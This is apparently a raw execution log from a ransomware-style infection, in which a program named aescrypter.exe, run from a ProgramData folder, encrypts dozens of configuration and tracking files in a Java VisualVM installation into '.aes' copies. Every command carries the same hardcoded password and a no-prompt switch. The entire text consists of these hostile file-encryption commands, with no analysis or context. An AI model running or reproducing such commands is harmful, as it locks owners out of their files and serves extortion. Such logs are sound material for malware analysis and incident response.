"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

